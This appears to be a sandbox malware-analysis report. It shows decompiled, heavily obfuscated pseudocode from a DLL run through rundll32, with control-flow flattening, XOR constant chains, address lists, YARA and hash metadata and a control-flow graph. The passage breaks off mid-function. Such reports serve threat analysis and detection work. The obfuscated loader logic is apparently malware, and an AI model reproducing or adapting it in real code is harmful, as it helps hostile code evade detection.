				_v1616 = _v1616 + 0xf40e;
				_v1616 = _v1616 ^ 0x0001621e;
				_v1680 = 0xad27;
				_v1680 = _v1680 ^ 0x11741994;
				_v1680 = _v1680 ^ 0x828bebc7;
				_v1680 = _v1680 ^ 0x93ff4a0d;
				_v1704 = 0x2eca;
				_v1704 = _v1704 << 3;
				_v1704 = _v1704 + 0xffff4fca;
				_v1704 = _v1704 ^ 0x0000afdc;
				_v1672 = 0xb5e9;
				_v1672 = _v1672 / _t732;
				_v1672 = _v1672 | 0x3cbbe239;
				_v1672 = _v1672 ^ 0x3cbbda4d;
				_v1760 = 0x653d;
				_v1760 = _v1760 ^ 0x5e29d2db;
				_v1760 = _v1760 / _t656;
				_v1760 = _v1760 * 0x30;
				_v1760 = _v1760 ^ 0x6e3d0fd3;
				_v1768 = 0xee4d;
				_v1768 = _v1768 + 0xffff4943;
				_v1768 = _v1768 * 0x23;
				_v1768 = _v1768 | 0x6650922d;
				_v1768 = _v1768 ^ 0x6657f47d;
				_v1620 = 0x4442;
				_v1620 = _v1620 << 0xa;
				_v1620 = _v1620 ^ 0x01114709;
				_v1752 = 0x70f3;
				_v1752 = _v1752 + 0xc573;
				_v1752 = _v1752 ^ 0x8bd692b9;
				_v1752 = _v1752 + 0x375f;
				_v1752 = _v1752 ^ 0x8bd7cab9;
				_v1692 = 0x8d49;
				_v1692 = _v1692 | 0xadf95343;
				_t657 = 0x6f;
				_v1692 = _v1692 / _t657;
				_v1692 = _v1692 ^ 0x01915aad;
				_v1608 = 0x9445;
				_v1608 = _v1608 ^ 0xfa8556cd;
				_v1608 = _v1608 ^ 0xfa8587ad;
				_v1596 = 0xa356;
				_v1596 = _v1596 ^ 0x020e3d0f;
				_v1596 = _v1596 ^ 0x020eaa39;
				_v1668 = 0x9fc9;
				_v1668 = _v1668 << 1;
				_v1668 = _v1668 + 0xffff5705;
				_v1668 = _v1668 ^ 0x0000873c;
				_v1676 = 0x5aa4;
				_t658 = 0x57;
				_v1676 = _v1676 * 0xd;
				_t659 = 0x74;
				_v1676 = _v1676 / _t658;
				_v1676 = _v1676 ^ 0x000044cc;
				_v1684 = 0x6a20;
				_v1684 = _v1684 << 5;
				_v1684 = _v1684 + 0xffff5b62;
				_v1684 = _v1684 ^ 0x000ca81d;
				_v1652 = 0xc97c;
				_v1652 = _v1652 >> 5;
				_v1652 = _v1652 ^ 0x00002e12;
				_v1696 = 0x481c;
				_v1696 = _v1696 << 5;
				_v1696 = _v1696 << 0xf;
				_v1696 = _v1696 ^ 0x81c0713e;
				_v1732 = 0x6e12;
				_v1732 = _v1732 + 0x239d;
				_v1732 = _v1732 << 0xe;
				_v1732 = _v1732 ^ 0x246bc9a9;
				_v1812 = 0x8d84;
				_v1812 = _v1812 << 7;
				_v1812 = _v1812 ^ 0x627ea561;
				_v1812 = _v1812 + 0xffffb69b;
				_v1812 = _v1812 ^ 0x623827c0;
				_v1612 = 0x2459;
				_v1612 = _v1612 * 0x5f;
				_v1612 = _v1612 ^ 0x000d4756;
				_v1780 = 0x3738;
				_v1780 = _v1780 >> 0xf;
				_v1780 = _v1780 + 0x7756;
				_t660 = 0x49;
				_v1780 = _v1780 / _t659;
				_v1780 = _v1780 ^ 0x00004d7c;
				_v1604 = 0xa6e8;
				_v1604 = _v1604 >> 0xb;
				_v1604 = _v1604 ^ 0x00007121;
				_v1700 = 0x3aaa;
				_v1700 = _v1700 * 0x35;
				_v1700 = _v1700 | 0x9258fa78;
				_v1700 = _v1700 ^ 0x925ce803;
				_v1776 = 0xc1a7;
				_v1776 = _v1776 | 0xe727275b;
				_t347 =  &_v1776; // 0xe727275b
				_v1776 =  *_t347 / _t660;
				_v1776 = _v1776 | 0x34b38de4;
				_v1776 = _v1776 ^ 0x37bb8fe4;
				_v1784 = 0x91c3;
				_t661 = 0x64;
				_v1784 = _v1784 / _t661;
				_v1784 = _v1784 + 0x788e;
				_v1784 = _v1784 / _t732;
				_v1784 = _v1784 ^ 0x000026f9;
				_v1756 = 0xe29b;
				_v1756 = _v1756 << 5;
				_v1756 = _v1756 >> 9;
				_t662 = 0x21;
				_v1756 = _v1756 / _t662;
				_v1756 = _v1756 ^ 0x00004ef7;
				_v1796 = 0x179;
				_v1796 = _v1796 + 0x7a5c;
				_v1796 = _v1796 | 0xddf9ffa6;
				_v1796 = _v1796 ^ 0xddf99719;
				_v1688 = 0xa45d;
				_t663 = 0x17;
				_v1688 = _v1688 / _t663;
				_v1688 = _v1688 ^ 0xa9b19ce5;
				_v1688 = _v1688 ^ 0xa9b19a72;
				_v1772 = 0x6fb4;
				_v1772 = _v1772 << 9;
				_v1772 = _v1772 >> 0xb;
				_v1772 = _v1772 >> 4;
				_v1772 = _v1772 ^ 0x0000531d;
				_v1636 = 0x1eab;
				_v1636 = _v1636 | 0x295ec68a;
				_v1636 = _v1636 ^ 0x295ec908;
				_v1712 = 0x5da6;
				_v1712 = _v1712 ^ 0x5fdaae01;
				_v1712 = _v1712 ^ 0xdf7664b8;
				_v1712 = _v1712 ^ 0x80ac9034;
				_v1764 = 0x8aec;
				_t664 = 0x4b;
				_v1764 = _v1764 / _t664;
				_t665 = 0x45;
				_v1764 = _v1764 * 0x5a;
				_v1764 = _v1764 * 0x7e;
				_v1764 = _v1764 ^ 0x0052267c;
				_v1788 = 0x22ed;
				_v1788 = _v1788 + 0xffffcd0d;
				_v1788 = _v1788 * 0x72;
				_v1788 = _v1788 << 0xc;
				_v1788 = _v1788 ^ 0x8dd516dd;
				_v1744 = 0x24eb;
				_v1744 = _v1744 ^ 0x0b5c0f43;
				_v1744 = _v1744 ^ 0xa1a0b70d;
				_v1744 = _v1744 / _t665;
				_v1744 = _v1744 ^ 0x027a3009;
				_v1624 = 0x7660;
				_v1624 = _v1624 ^ 0x00000e09;
				_v1632 = 0x758c;
				_v1632 = _v1632 << 0xa;
				_v1632 = _v1632 ^ 0x01d672ff;
				_v1660 = 0x7b50;
				_v1660 = _v1660 >> 1;
				_v1660 = _v1660 >> 3;
				_v1660 = _v1660 ^ 0x000037ef;
				_v1708 = 0x99fa;
				_v1708 = _v1708 ^ 0xe57d132d;
				_v1708 = _v1708 ^ 0x77fb962a;
				_v1708 = _v1708 ^ 0x92961cfd;
				_t616 = E100145F8();
				_t733 = _v1592;
				_t739 = _t616;
				_t651 = _v1592;
				while(1) {
					L1:
					_t617 = 0x2cd60113;
					do {
						while(1) {
							L2:
							_t742 = _t734 - 0x1e5e78f1;
							if(_t742 > 0) {
								break;
							}
							if(_t742 == 0) {
								_t636 = E1000D0DE(_v1584, _v1616, _v1680, _v1704, _v1672, _v1580);
								_t651 = _t636;
								_t740 = _t740 + 0x10;
								__eflags = _t636;
								_t617 = 0x2cd60113;
								_t734 =  !=  ? 0x2cd60113 : 0x12daf843;
								continue;
							}
							if(_t734 == 0x178ada5) {
								 *((intOrPtr*)(_t733 + 0x20)) = _v1588;
								_t638 =  *0x10021400; // 0x0
								 *(_t733 + 0x10) = _t638;
								 *0x10021400 = _t733;
								return _t638;
							}
							if(_t734 == 0x2a95541) {
								_t675 = _v1576;
								E100078F0(_t675, _v1636, _v1712, _v1764, _v1788);
								_t740 = _t740 + 0xc;
								_t734 = 0x178ada5;
								while(1) {
									L1:
									_t617 = 0x2cd60113;
									goto L2;
								}
							}
							if(_t734 == 0x12daf843) {
								_t675 = _v1756;
								E100091CD(_t675, _v1796, _v1688, _v1584, _v1772);
								_t740 = _t740 + 0xc;
								_t734 = 0x2a95541;
								while(1) {
									L1:
									_t617 = 0x2cd60113;
									goto L2;
								}
							}
							if(_t734 != 0x149dffe6) {
								if(_t734 == 0x178c8cba) {
									_push( &_v1044);
									E10002628(_v1588, _v1592);
									asm("sbb esi, esi");
									_t675 = 0x100012f8;
									_t737 = _t734 & 0x16fb7084;
									__eflags = _t737;
									L12:
									_t734 = _t737 + 0x22b4e350;
									while(1) {
										L1:
										_t617 = 0x2cd60113;
										goto L2;
									}
								} else {
									_t748 = _t734 - 0x1a9938f9;
									if(_t734 != 0x1a9938f9) {
										goto L28;
									} else {
										_push(_v1780);
										_push(1);
										_push( &_v524);
										_push(_t675);
										_push(_v1612);
										_push(_v1812);
										_t675 = _v1696;
										_push(0);
										_push(0);
										E100189F6(_t675, _v1732, _t748);
										_t740 = _t740 + 0x20;
										_t734 = 0x32f46056;
										while(1) {
											L1:
											_t617 = 0x2cd60113;
											goto L2;
										}
									}
								}
							}
							_t676 = 0x24;
							_t643 = E100157E8(_t676);
							_t733 = _t643;
							_t675 = _t675;
							__eflags = _t733;
							if(_t733 != 0) {
								_push(_t675);
								E10001D54(_v1720, _t675, _v1804, _v1748, _v1664,  &_v1564, _v1728, _v1600);
								_t740 = _t740 + 0x20;
								_t734 = 0x178c8cba;
								while(1) {
									L1:
									_t617 = 0x2cd60113;
									goto L2;
								}
							}
							return _t643;
							L32:
						}
						__eflags = _t734 - 0x22b4e350;
						if(_t734 == 0x22b4e350) {
							E100091CD(_v1744, _v1624, _v1632, _t733, _v1660);
							_t740 = _t740 + 0xc;
							_t734 = 0xf568d32;
							_t617 = 0x2cd60113;
							goto L28;
						} else {
							__eflags = _t734 - 0x23197851;
							if(_t734 == 0x23197851) {
								E10011B71( &_v1576, _v1640,  &_v1584, _v1648);
								asm("sbb esi, esi");
								_t734 = (_t734 & 0x1bb523b0) + 0x2a95541;
								goto L1;
							} else {
								__eflags = _t734 - _t617;
								if(__eflags == 0) {
									_push(0x100013a8);
									_push(_v1620);
									E100164EC(_t651, __eflags, E1001BF25(_v1760, _v1768, __eflags), _v1752, 0x104,  &_v1044,  &_v1564, _v1692, _v1608, _v1596);
									E1001C5F7(_v1668, _v1676, _v1684, _v1652, _t622);
									_t740 = _t740 + 0x34;
									_t734 = 0x1a9938f9;
									while(1) {
										L1:
										_t617 = 0x2cd60113;
										goto L2;
									}
								} else {
									__eflags = _t734 - 0x32f46056;
									if(_t734 == 0x32f46056) {
										E100091CD(_v1604, _v1700, _v1776, _t651, _v1784);
										_t740 = _t740 + 0xc;
										_t734 = 0x12daf843;
										while(1) {
											L1:
											_t617 = 0x2cd60113;
											goto L2;
										}
									} else {
										__eflags = _t734 - 0x39b053d4;
										if(_t734 != 0x39b053d4) {
											goto L28;
										} else {
											_v1572 = E10009295();
											_t631 = E1001BBAB(_v1724, _v1824, _t630, _v1740);
											_pop(_t681);
											_v1568 = 2 + _t631 * 2;
											_t675 = _v1792;
											E1001C353(_t675, _v1708, _v1800, _t739,  &_v1576, _t681, _v1716, _t681, _t739, _t739, _v1808, _v1816);
											_t740 = _t740 + 0x28;
											asm("sbb esi, esi");
											_t737 = _t734 & 0x00649501;
											goto L12;
										}
									}
								}
							}
						}
						goto L32;
						L28:
						__eflags = _t734 - 0xf568d32;
					} while (__eflags != 0);
					return _t617;
				}
			}





































































































                                                                        0x1001296f
                                                                        0x10012976
                                                                        0x1001297d
                                                                        0x10012990
                                                                        0x10012997
                                                                        0x1001299c
                                                                        0x100129a7
                                                                        0x100129b7
                                                                        0x100129bc
                                                                        0x100129c2
                                                                        0x100129ca
                                                                        0x100129cf
                                                                        0x100129d7
                                                                        0x100129e2
                                                                        0x100129ea
                                                                        0x100129f5
                                                                        0x10012a00
                                                                        0x10012a0b
                                                                        0x10012a16
                                                                        0x10012a29
                                                                        0x10012a2c
                                                                        0x10012a33
                                                                        0x10012a3e
                                                                        0x10012a49
                                                                        0x10012a51
                                                                        0x10012a59
                                                                        0x10012a63
                                                                        0x10012a67
                                                                        0x10012a6f
                                                                        0x10012a77
                                                                        0x10012a7c
                                                                        0x10012a84
                                                                        0x10012a8c
                                                                        0x10012a94
                                                                        0x10012a9f
                                                                        0x10012aa7
                                                                        0x10012ab2
                                                                        0x10012abd
                                                                        0x10012ac5
                                                                        0x10012acd
                                                                        0x10012ad2
                                                                        0x10012ada
                                                                        0x10012af0
                                                                        0x10012af7
                                                                        0x10012b02
                                                                        0x10012b0e
                                                                        0x10012b11
                                                                        0x10012b15
                                                                        0x10012b1d
                                                                        0x10012b25
                                                                        0x10012b2d
                                                                        0x10012b3a
                                                                        0x10012b3e
                                                                        0x10012b46
                                                                        0x10012b4e
                                                                        0x10012b56
                                                                        0x10012b5e
                                                                        0x10012b63
                                                                        0x10012b6b
                                                                        0x10012b73
                                                                        0x10012b7b
                                                                        0x10012b80
                                                                        0x10012b8a
                                                                        0x10012b92
                                                                        0x10012b9a
                                                                        0x10012ba2
                                                                        0x10012ba7
                                                                        0x10012baf
                                                                        0x10012bb7
                                                                        0x10012bbf
                                                                        0x10012bc7
                                                                        0x10012bcf
                                                                        0x10012bd7
                                                                        0x10012beb
                                                                        0x10012bf0
                                                                        0x10012bf7
                                                                        0x10012c02
                                                                        0x10012c0d
                                                                        0x10012c1d
                                                                        0x10012c23
                                                                        0x10012c2b
                                                                        0x10012c33
                                                                        0x10012c3b
                                                                        0x10012c43
                                                                        0x10012c50
                                                                        0x10012c53
                                                                        0x10012c54
                                                                        0x10012c58
                                                                        0x10012c5d
                                                                        0x10012c65
                                                                        0x10012c70
                                                                        0x10012c78
                                                                        0x10012c83
                                                                        0x10012c8e
                                                                        0x10012c99
                                                                        0x10012ca4
                                                                        0x10012caf
                                                                        0x10012cba
                                                                        0x10012cc5
                                                                        0x10012cd0
                                                                        0x10012cdb
                                                                        0x10012ce6
                                                                        0x10012cf1
                                                                        0x10012cfc
                                                                        0x10012d04
                                                                        0x10012d0f
                                                                        0x10012d1a
                                                                        0x10012d30
                                                                        0x10012d37
                                                                        0x10012d42
                                                                        0x10012d4d
                                                                        0x10012d55
                                                                        0x10012d63
                                                                        0x10012d6c
                                                                        0x10012d70
                                                                        0x10012d78
                                                                        0x10012d80
                                                                        0x10012d8d
                                                                        0x10012d91
                                                                        0x10012d99
                                                                        0x10012da1
                                                                        0x10012dac
                                                                        0x10012db4
                                                                        0x10012dbf
                                                                        0x10012dc7
                                                                        0x10012dd1
                                                                        0x10012dd9
                                                                        0x10012de1
                                                                        0x10012de9
                                                                        0x10012df4
                                                                        0x10012e08
                                                                        0x10012e0d
                                                                        0x10012e16
                                                                        0x10012e21
                                                                        0x10012e2c
                                                                        0x10012e37
                                                                        0x10012e42
                                                                        0x10012e4d
                                                                        0x10012e58
                                                                        0x10012e63
                                                                        0x10012e6e
                                                                        0x10012e75
                                                                        0x10012e80
                                                                        0x10012e8b
                                                                        0x10012e9e
                                                                        0x10012ea1
                                                                        0x10012eb1
                                                                        0x10012eb2
                                                                        0x10012ebb
                                                                        0x10012ec6
                                                                        0x10012ed1
                                                                        0x10012ed9
                                                                        0x10012ee4
                                                                        0x10012eef
                                                                        0x10012efa
                                                                        0x10012f02
                                                                        0x10012f0d
                                                                        0x10012f18
                                                                        0x10012f20
                                                                        0x10012f28
                                                                        0x10012f33
                                                                        0x10012f3b
                                                                        0x10012f43
                                                                        0x10012f48
                                                                        0x10012f50
                                                                        0x10012f58
                                                                        0x10012f5d
                                                                        0x10012f65
                                                                        0x10012f6d
                                                                        0x10012f75
                                                                        0x10012f8a
                                                                        0x10012f91
                                                                        0x10012f9c
                                                                        0x10012fa4
                                                                        0x10012fa9
                                                                        0x10012fb7
                                                                        0x10012fb8
                                                                        0x10012fbc
                                                                        0x10012fc4
                                                                        0x10012fcf
                                                                        0x10012fd7
                                                                        0x10012fe2
                                                                        0x10012ff5
                                                                        0x10012ffc
                                                                        0x10013007
                                                                        0x10013012
                                                                        0x1001301a
                                                                        0x10013024
                                                                        0x1001302c
                                                                        0x10013030
                                                                        0x10013038
                                                                        0x10013040
                                                                        0x1001304e
                                                                        0x10013053
                                                                        0x10013057
                                                                        0x10013067
                                                                        0x1001306d
                                                                        0x10013075
                                                                        0x1001307d
                                                                        0x10013082
                                                                        0x1001308b
                                                                        0x10013090
                                                                        0x10013096
                                                                        0x1001309e
                                                                        0x100130a6
                                                                        0x100130ae
                                                                        0x100130b6
                                                                        0x100130be
                                                                        0x100130d0
                                                                        0x100130d5
                                                                        0x100130de
                                                                        0x100130e9
                                                                        0x100130f4
                                                                        0x100130fc
                                                                        0x10013101
                                                                        0x10013106
                                                                        0x1001310b
                                                                        0x10013113
                                                                        0x1001311e
                                                                        0x10013129
                                                                        0x10013134
                                                                        0x1001313f
                                                                        0x1001314a
                                                                        0x10013155
                                                                        0x10013160
                                                                        0x1001316c
                                                                        0x10013171
                                                                        0x1001317c
                                                                        0x1001317d
                                                                        0x10013186
                                                                        0x1001318a
                                                                        0x10013192
                                                                        0x1001319a
                                                                        0x100131a7
                                                                        0x100131ab
                                                                        0x100131b0
                                                                        0x100131b8
                                                                        0x100131c0
                                                                        0x100131c8
                                                                        0x100131d6
                                                                        0x100131da
                                                                        0x100131e2
                                                                        0x100131fb
                                                                        0x10013206
                                                                        0x10013211
                                                                        0x10013219
                                                                        0x10013224
                                                                        0x1001322f
                                                                        0x10013236
                                                                        0x1001323e
                                                                        0x10013249
                                                                        0x10013254
                                                                        0x1001325f
                                                                        0x1001326a
                                                                        0x10013279
                                                                        0x1001327e
                                                                        0x10013285
                                                                        0x10013287
                                                                        0x1001328e
                                                                        0x1001328e
                                                                        0x1001328e
                                                                        0x10013293
                                                                        0x10013293
                                                                        0x10013293
                                                                        0x10013293
                                                                        0x10013299
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001329f
                                                                        0x10013442
                                                                        0x10013447
                                                                        0x10013449
                                                                        0x1001344c
                                                                        0x10013453
                                                                        0x10013458
                                                                        0x00000000
                                                                        0x10013458
                                                                        0x100132ab
                                                                        0x1001363d
                                                                        0x10013640
                                                                        0x10013645
                                                                        0x10013648
                                                                        0x00000000
                                                                        0x10013648
                                                                        0x100132b7
                                                                        0x100133ff
                                                                        0x10013406
                                                                        0x1001340b
                                                                        0x1001340e
                                                                        0x1001328e
                                                                        0x1001328e
                                                                        0x1001328e
                                                                        0x00000000
                                                                        0x1001328e
                                                                        0x1001328e
                                                                        0x100132c3
                                                                        0x100133d3
                                                                        0x100133d7
                                                                        0x100133dc
                                                                        0x100133df
                                                                        0x1001328e
                                                                        0x1001328e
                                                                        0x1001328e
                                                                        0x00000000
                                                                        0x1001328e
                                                                        0x1001328e
                                                                        0x100132cf
                                                                        0x100132db
                                                                        0x1001333c
                                                                        0x10013342
                                                                        0x1001334a
                                                                        0x1001334c
                                                                        0x1001334d
                                                                        0x1001334d
                                                                        0x10013353
                                                                        0x10013353
                                                                        0x1001328e
                                                                        0x1001328e
                                                                        0x1001328e
                                                                        0x00000000
                                                                        0x1001328e
                                                                        0x100132dd
                                                                        0x100132dd
                                                                        0x100132e3
                                                                        0x00000000
                                                                        0x100132e9
                                                                        0x100132e9
                                                                        0x100132f4
                                                                        0x100132f6
                                                                        0x100132f7
                                                                        0x100132f8
                                                                        0x100132ff
                                                                        0x1001330a
                                                                        0x10013311
                                                                        0x10013313
                                                                        0x10013315
                                                                        0x1001331a
                                                                        0x1001331d
                                                                        0x1001328e
                                                                        0x1001328e
                                                                        0x1001328e
                                                                        0x00000000
                                                                        0x1001328e
                                                                        0x1001328e
                                                                        0x100132e3
                                                                        0x100132db
                                                                        0x1001336f
                                                                        0x10013370
                                                                        0x10013375
                                                                        0x10013377
                                                                        0x10013378
                                                                        0x1001337a
                                                                        0x10013380
                                                                        0x100133ab
                                                                        0x100133b0
                                                                        0x100133b3
                                                                        0x1001328e
                                                                        0x1001328e
                                                                        0x1001328e
                                                                        0x00000000
                                                                        0x1001328e
                                                                        0x1001328e
                                                                        0x10013658
                                                                        0x00000000
                                                                        0x10013658
                                                                        0x10013460
                                                                        0x10013466
                                                                        0x10013616
                                                                        0x1001361b
                                                                        0x1001361e
                                                                        0x10013623
                                                                        0x00000000
                                                                        0x1001346c
                                                                        0x1001346c
                                                                        0x10013472
                                                                        0x100135e0
                                                                        0x100135e8
                                                                        0x100135f1
                                                                        0x00000000
                                                                        0x10013478
                                                                        0x10013478
                                                                        0x1001347a
                                                                        0x1001353c
                                                                        0x10013541
                                                                        0x1001358f
                                                                        0x100135b1
                                                                        0x100135b6
                                                                        0x100135b9
                                                                        0x1001328e
                                                                        0x1001328e
                                                                        0x1001328e
                                                                        0x00000000
                                                                        0x1001328e
                                                                        0x10013480
                                                                        0x10013480
                                                                        0x10013486
                                                                        0x1001352a
                                                                        0x1001352f
                                                                        0x10013532
                                                                        0x1001328e
                                                                        0x1001328e
                                                                        0x1001328e
                                                                        0x00000000
                                                                        0x1001328e
                                                                        0x1001348c
                                                                        0x1001348c
                                                                        0x10013492
                                                                        0x00000000
                                                                        0x10013498
                                                                        0x100134b5
                                                                        0x100134bc
                                                                        0x100134c2
                                                                        0x100134d2
                                                                        0x100134f8
                                                                        0x100134fc
                                                                        0x10013501
                                                                        0x10013506
                                                                        0x10013508
                                                                        0x00000000
                                                                        0x10013508
                                                                        0x10013492
                                                                        0x10013486
                                                                        0x1001347a
                                                                        0x10013472
                                                                        0x00000000
                                                                        0x10013628
                                                                        0x10013628
                                                                        0x10013628
                                                                        0x00000000
                                                                        0x10013293

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FolderPath
                                                                        • String ID: j$!q$)@$+/1d$=e$?1$?H$BD$M$VG$Y$$[''$\z$_7$`v$dM$|&R$|M$"$$$7
                                                                        • API String ID: 1514166925-3565163747
                                                                        • Opcode ID: 9163a8007b0dceb48b04801531080e3a121e2b3b0e415cdbf67a5b480fcb8054
                                                                        • Instruction ID: 2b517cf3c11194d57aa6f79e2f665a47e465c6b4f990833d55609906dbc9d50d
                                                                        • Opcode Fuzzy Hash: 9163a8007b0dceb48b04801531080e3a121e2b3b0e415cdbf67a5b480fcb8054
                                                                        • Instruction Fuzzy Hash: 57520F715083818FE3B8CF61C54AB8BBBE1BBC4704F10891DE5D98A2A0D7B59949CF53
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10004EA1, Relevance: 24.1, Strings: 19, Instructions: 375COMMONCrypto
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 607 10004ea1-10005426 call 100056b2 610 1000542e-10005430 607->610 611 10005431-10005437 610->611 612 1000563c-1000566a call 10002577 611->612 613 1000543d-10005443 611->613 622 10005676-1000567d 612->622 623 1000566c-10005671 612->623 614 10005515-10005520 613->614 615 10005449-1000544f 613->615 618 10005615-10005631 614->618 619 10005526-1000552e 614->619 620 100054b0-10005510 call 1001bf25 call 10013d3d call 1001c5f7 615->620 621 10005451-10005457 615->621 618->612 625 10005530-10005539 619->625 626 1000555a-10005562 619->626 620->610 627 100054a9-100054ae 621->627 628 10005459-1000545f 621->628 631 1000567e-10005684 622->631 623->610 629 10005550-10005555 625->629 634 1000553b-10005543 625->634 626->629 630 10005564-10005610 call 1001bf25 call 100163bf call 10004ea1 call 1001c5f7 626->630 627->611 635 10005465-1000546b 628->635 636 1000568c-100056a5 call 10001ec9 628->636 629->611 630->629 631->611 638 1000568a 631->638 634->626 641 10005545-1000554e 634->641 635->631 642 10005471-100054a7 call 1001d0a1 635->642 645 100056a8-100056b1 636->645 638->645 641->626 641->629 642->610
                                                                        C-Code - Quality: 81%
                                                                        			E10004EA1(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				char _v524;
				char _v1044;
				short _v1588;
				short _v1590;
				char _v1592;
				signed int _v1636;
				signed int _v1640;
				intOrPtr _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				void* _t372;
				signed int _t400;
				signed int _t403;
				void* _t404;
				signed int _t407;
				void* _t410;
				void* _t416;
				signed int _t420;
				void* _t423;
				void* _t429;
				void* _t457;
				signed int _t468;
				signed int _t470;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				signed int _t477;
				void* _t480;
				signed int* _t482;

				_push(_a24);
				_t480 = __ecx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t372);
				_v1640 = _v1640 & 0x00000000;
				_t482 =  &(( &_v1800)[8]);
				_v1644 = 0x4bd480;
				_v1780 = 0x9933;
				_t416 = 0x363f5361;
				_v1780 = _v1780 | 0xad73ff37;
				_v1780 = _v1780 ^ 0x960b9a74;
				_v1780 = _v1780 ^ 0x3b786553;
				_v1784 = 0x542f;
				_v1784 = _v1784 + 0xc8ce;
				_v1784 = _v1784 + 0xffffa8c2;
				_t468 = 0x5b;
				_v1784 = _v1784 / _t468;
				_v1784 = _v1784 ^ 0x00004f1f;
				_v1760 = 0xa937;
				_v1760 = _v1760 + 0xc6be;
				_v1760 = _v1760 | 0x9e8a2caa;
				_v1760 = _v1760 + 0xffff9fa2;
				_v1760 = _v1760 ^ 0x9e8b35b0;
				_v1792 = 0xa290;
				_t470 = 0x63;
				_v1792 = _v1792 * 0x38;
				_v1792 = _v1792 + 0xffff655b;
				_v1792 = _v1792 + 0xffff3f9a;
				_v1792 = _v1792 ^ 0x00223804;
				_v1740 = 0x49e2;
				_v1740 = _v1740 >> 8;
				_v1740 = _v1740 | 0xc414d990;
				_v1740 = _v1740 ^ 0xc41493fb;
				_v1800 = 0x74d9;
				_t471 = 0x17;
				_v1800 = _v1800 / _t470;
				_v1800 = _v1800 ^ 0xc291bda4;
				_v1800 = _v1800 + 0xeb6d;
				_v1800 = _v1800 ^ 0xc292eb29;
				_v1720 = 0x4d0b;
				_v1720 = _v1720 << 7;
				_v1720 = _v1720 + 0x277b;
				_v1720 = _v1720 ^ 0x00268d74;
				_v1768 = 0x75cf;
				_v1768 = _v1768 * 0x62;
				_v1768 = _v1768 + 0x1332;
				_v1768 = _v1768 >> 0xd;
				_v1768 = _v1768 ^ 0x00000ed4;
				_v1692 = 0xd85d;
				_v1692 = _v1692 + 0xd2aa;
				_v1692 = _v1692 ^ 0x0001f663;
				_v1788 = 0xbc3e;
				_v1788 = _v1788 | 0x282d42cc;
				_v1788 = _v1788 + 0xffffb4b2;
				_v1788 = _v1788 * 0x25;
				_v1788 = _v1788 ^ 0xce9a942b;
				_v1796 = 0x301;
				_v1796 = _v1796 ^ 0x0ec358c8;
				_v1796 = _v1796 / _t471;
				_v1796 = _v1796 + 0xffff6806;
				_v1796 = _v1796 ^ 0x00a3cb1c;
				_v1656 = 0xf49e;
				_v1656 = _v1656 + 0xffffddef;
				_v1656 = _v1656 ^ 0x0000aa95;
				_v1728 = 0xf403;
				_v1728 = _v1728 + 0x6a8e;
				_v1728 = _v1728 << 6;
				_v1728 = _v1728 ^ 0x0057d552;
				_v1756 = 0x4f4e;
				_v1756 = _v1756 + 0xffff0830;
				_v1756 = _v1756 | 0xfc8d1ff5;
				_v1756 = _v1756 >> 0xb;
				_v1756 = _v1756 ^ 0x001fca39;
				_v1680 = 0x60;
				_v1680 = _v1680 >> 0xd;
				_v1680 = _v1680 ^ 0x00002a5b;
				_v1688 = 0xc18a;
				_v1688 = _v1688 ^ 0xc8271709;
				_v1688 = _v1688 ^ 0xc827be32;
				_v1704 = 0xf8b0;
				_v1704 = _v1704 << 6;
				_v1704 = _v1704 ^ 0x003e063b;
				_v1772 = 0x7a1e;
				_v1772 = _v1772 ^ 0xc6946529;
				_v1772 = _v1772 << 4;
				_v1772 = _v1772 << 2;
				_v1772 = _v1772 ^ 0xa507b562;
				_v1744 = 0xe662;
				_v1744 = _v1744 >> 5;
				_v1744 = _v1744 | 0x81d50607;
				_v1744 = _v1744 ^ 0x81d55403;
				_v1716 = 0x2f94;
				_v1716 = _v1716 / _t468;
				_t472 = 0x2c;
				_v1716 = _v1716 / _t472;
				_v1716 = _v1716 ^ 0x00000a71;
				_v1648 = 0xc69;
				_v1648 = _v1648 + 0x3b27;
				_v1648 = _v1648 ^ 0x00004de4;
				_v1732 = 0x30eb;
				_v1732 = _v1732 | 0x980f1189;
				_t473 = 0x7e;
				_v1732 = _v1732 * 0x3d;
				_v1732 = _v1732 ^ 0x3b9ecce7;
				_v1684 = 0xb64c;
				_v1684 = _v1684 ^ 0x315bc1c3;
				_v1684 = _v1684 ^ 0x315b57c4;
				_v1724 = 0x6411;
				_v1724 = _v1724 | 0xfbcd3fff;
				_v1724 = _v1724 ^ 0xfbcd5420;
				_v1764 = 0xfef7;
				_v1764 = _v1764 >> 0xf;
				_v1764 = _v1764 ^ 0xb299bfc4;
				_v1764 = _v1764 | 0x06f7c44b;
				_v1764 = _v1764 ^ 0xb6ffeafa;
				_v1676 = 0x7f53;
				_v1676 = _v1676 ^ 0x68612cf3;
